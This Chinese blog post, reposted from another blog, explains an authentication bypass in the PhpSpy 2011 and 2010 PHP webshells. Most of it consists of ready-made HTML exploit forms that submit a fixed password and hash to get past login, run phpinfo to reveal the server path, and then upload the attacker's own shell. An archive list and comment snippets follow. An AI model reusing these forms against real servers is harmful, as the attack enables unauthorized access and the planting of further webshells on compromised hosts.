Phpspy 2011 继续身份验证绕过漏洞
转载自hackshell博客:http://www.hackshell.net/blog/?p=357
官方目前下载已经修补上了 目前官方下载是2011.php, 文件名为2011ok.php的是带洞版本。
看到$pass还是在那个函数的上面,但是验证成功过后用了一个Location重定向了一下,之后会再次检查一次cookies。
但是想不明白作者为什么这样做,和2010的原理一样,一样绕过:
下面给出一个更为直接的利用方法,上传你自己的新shell:
<form method="POST" action="http://localhost/2011.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="submit" value="Login"></form>
点击Login,这步点登录后 是登录界面 继续操作下一步:
<form method="POST" action="http://localhost/2011.php">
<input name="password" type="text" size="20" value="hackshell_net">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
然后访问:
<form action="http://localhost/2011.php" method="POST" enctype="multipart/form-data">
<input name="password" type="password" size="20">
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
<input name="uploadfile" value="" type="file">
<input name="doupfile" value="Upload" type="submit">
<input name="uploaddir" value="D:/workspace/" type="hidden">
<input name="dir" value="D:/workspace/" type="hidden">
</form>
其中把iploaddir的value改为phpinfo中看到的路径,上传shell。
另外附上2010的利用代码:
<!--测试登陆--!>
<form method="POST" action="http://localhost/2010.php">
<input type="hidden" name="admin['pass']" value="1">
<input type="submit" value="Login"></form>
<!--测试phpinfo--!>
<form method="POST" action="http://localhost/2010.php">
<input type="hidden" name="admin['pass']" value="1">
<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
<!--测试上传--!>
<form method="POST" action="http://localhost/2010.php" enctype="multipart/form-data">
<input type="hidden" name="admin['pass']" value="1">
<input name="uploadfile" value="" type="file">
<input name="doupfile" value="Upload" type="submit">
<input name="uploaddir" value="c:\wamp\www\" type="hidden">
<input name="dir" value="c:\wamp\www\" type="hidden">
</form>
今晚看到这文章测试的成果哦
标签: Phpspy身份验证绕过漏洞
Sort
Archive
- 2023年1月(1)
- 2019年4月(1)
- 2018年12月(2)
- 2014年9月(1)
- 2014年7月(1)
- 2014年5月(4)
- 2013年4月(10)
- 2013年3月(2)
- 2012年11月(10)
- 2012年10月(2)
- 2012年9月(2)
- 2012年8月(9)
- 2012年7月(1)
- 2012年6月(4)
- 2012年5月(4)
- 2012年4月(11)
- 2012年3月(11)
- 2012年1月(16)
- 2011年12月(6)
- 2011年11月(8)
- 2011年10月(8)
- 2011年9月(3)
- 2011年8月(6)
- 2011年7月(3)
- 2011年6月(5)
- 2011年5月(10)
- 2011年4月(4)
- 2011年3月(4)
- 2011年2月(7)
- 2011年1月(16)
- 2010年12月(9)
- 2010年11月(29)
- 2010年10月(14)
- 2010年9月(15)
- 2010年8月(16)
- 2010年7月(22)
- 2010年6月(19)
- 2010年5月(27)
- 2010年4月(21)
- 2010年3月(24)
- 2010年2月(9)
Comment
- Lightning_bear
失效了 - admin
在哪下载? - 王健宇
@红河:CMD命令里... - 红河
台式机安装了蓝牙。但... - M2nT1ger
@LiveOnLov... - LiveOnLove
可以将Tablet ... - 阿生
表示支持了 - M2nT1ger
@无:每种都学啊。 - 无
向您这么厉害,得学习... - M2nT1ger
@被屏蔽的昵称:谢谢...
Link
发表评论: